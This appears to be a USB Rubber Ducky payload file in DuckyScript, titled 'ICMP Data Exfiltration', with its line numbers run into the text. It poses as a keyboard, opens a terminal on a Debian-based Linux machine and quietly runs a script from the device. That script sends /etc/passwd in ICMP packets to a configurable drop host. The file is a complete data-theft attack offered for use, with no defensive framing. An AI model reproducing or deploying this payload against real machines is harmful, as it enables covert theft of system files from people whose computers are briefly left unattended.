Path: blob/master/payloads/library/exfiltration/Lin_ICMP-Data-Exfiltration/payload.txt
2968 views
REM TITLE : ICMP Data Exfiltration1REM AUTHOR : TW-D2REM TARGET : Debian-Based Linux Distributions3REM VERSION : 1.04REM CATEGORY : Exfiltration5REM REQUIREMENT : DuckyScript 3.067ATTACKMODE HID STORAGE8DELAY 15000910REM ---11REM USB Rubber Ducky label.12REM ---13DEFINE #RD_LABEL DUCKY1415REM ---16REM Absolute path of the file to be exfiltrated.17REM ---18DEFINE #TARGET_FILE /etc/passwd1920REM ---21REM IP address or domain receiving ICMP packets.22REM ---23DEFINE #DROP_HOST www.example.com2425SAVE_HOST_KEYBOARD_LOCK_STATE2627IF ( $_CAPSLOCK_ON ) THEN28CAPSLOCK29DELAY 50030END_IF3132IF ( $_NUMLOCK_ON == FALSE ) THEN33NUMLOCK34DELAY 50035END_IF3637CTRL-ALT t38DELAY 200039STRINGLN nohup "${BASH}" /media/"${USER}"/#RD_LABEL/payload.sh #TARGET_FILE #DROP_HOST &> /dev/null40DELAY 150041STRINGLN exit4243RESTORE_HOST_KEYBOARD_LOCK_STATE444546